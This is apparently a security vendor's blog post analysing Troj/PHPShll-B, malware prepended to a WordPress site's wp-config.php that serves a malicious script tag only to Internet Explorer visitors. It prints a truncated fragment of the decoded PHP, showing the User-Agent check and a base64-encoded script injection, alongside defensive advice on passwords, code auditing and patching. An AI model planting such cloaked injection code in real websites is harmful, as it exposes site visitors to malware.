Troj/PHPShll-B: Malware injects itself into WordPress installations


On Friday, a colleague in our IT department asked about a Mal/Badsrc-C malware detection that had been found by Sophos products on one of their friend’s websites.

When I initially downloaded the website it looked clean. However, the automated systems inside SophosLabs were detecting the webpage as being infected with Mal/Badsrc-C.

So, I investigated a little more deeply – repeating the download after setting the User-Agent in my browser to pretend to be Internet Explorer.

This time I saw:

>>> Virus 'Mal/Badsrc-C' found in file index.html

Clearly, the malware on the website was planted in such a way that it would only manifest itself if it believed that the computer visiting the webpage was running Internet Explorer.

When you look at the last line of the index.html file you can see the appended malicious script tag:

Appended malicious script tag

As my colleague knew the affected website’s owner, I was able to gain a complete copy of the site which was running an installation of the popular WordPress blogging platform.

Looking at the WordPress configuration file (wp-config.php) I saw a suspicious piece of code prepended:

When this code is run it decodes to some suspicious code:

stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){ return base64_decode("PHNjcmlwdCBzcm...

The above code snippet means that malicious code will only be served if the User-Agent is Internet Explorer. The geekier amongst you will recognise the base64 string as being the beginning of:

<script src

Sophos now detects and disinfects this modified code as Troj/PHPShll-B.

So, what’s happened is that somehow malicious code has managed to inject itself into the PHP code used on some websites running WordPress, meaning that if you visit them when running Internet Explorer you could be exposing yourself to a malware attack.

What isn’t clear is exactly how the malicious code managed to embed itself on the website, although it was most probably via compromised FTP credentials.

If you run a site which uses WordPress you would be wise to ensure that your passwords are chosen carefully (not dictionary words, and not easy to guess) and that you are not using the same credentials on any other websites. If you think it’s possible that your password details may have been stolen – or if you use the same passwords elsewhere on the internet – change them immediately.

Furthermore, you should be regularly auditing the code on your site to ensure that there have not been any unauthorised changes.

Finally, always ensure that your website software is up-to-date and fully patched.

This hack appears to be widespread and website owners need to be vigilant.